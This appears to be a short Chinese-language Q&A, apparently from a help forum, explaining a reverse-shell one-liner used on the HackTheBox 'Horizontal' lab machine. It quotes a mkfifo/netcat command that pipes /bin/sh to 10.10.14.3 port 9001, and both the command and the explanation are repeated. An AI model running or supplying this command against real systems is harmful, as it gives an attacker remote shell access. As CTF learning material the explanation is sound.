rm /tmp/f
mkfifo /tmp/f
cat/tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 9001 >/tmp/f
它在 Horizontal HTB(laravel 8 RCE)上使用。
答案1
它启动一个连接到 10.10.14.3 端口 9001 的反向 shell。与 /tmp/f 的业务是因为单独的 shell 管道只允许单向通信,但反向 shell 应该是双向的。
rm /tmp/f
mkfifo /tmp/f
cat/tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 9001 >/tmp/f
它在 Horizontal HTB(laravel 8 RCE)上使用。
它启动一个连接到 10.10.14.3 端口 9001 的反向 shell。与 /tmp/f 的业务是因为单独的 shell 管道只允许单向通信,但反向 shell 应该是双向的。